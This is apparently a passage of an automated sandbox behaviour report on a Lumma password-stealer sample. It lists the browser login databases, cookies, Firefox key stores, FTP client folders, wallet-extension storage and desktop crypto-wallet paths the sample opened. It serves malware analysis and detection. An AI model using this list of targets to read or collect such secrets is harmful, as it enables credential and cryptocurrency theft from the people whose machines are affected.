        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
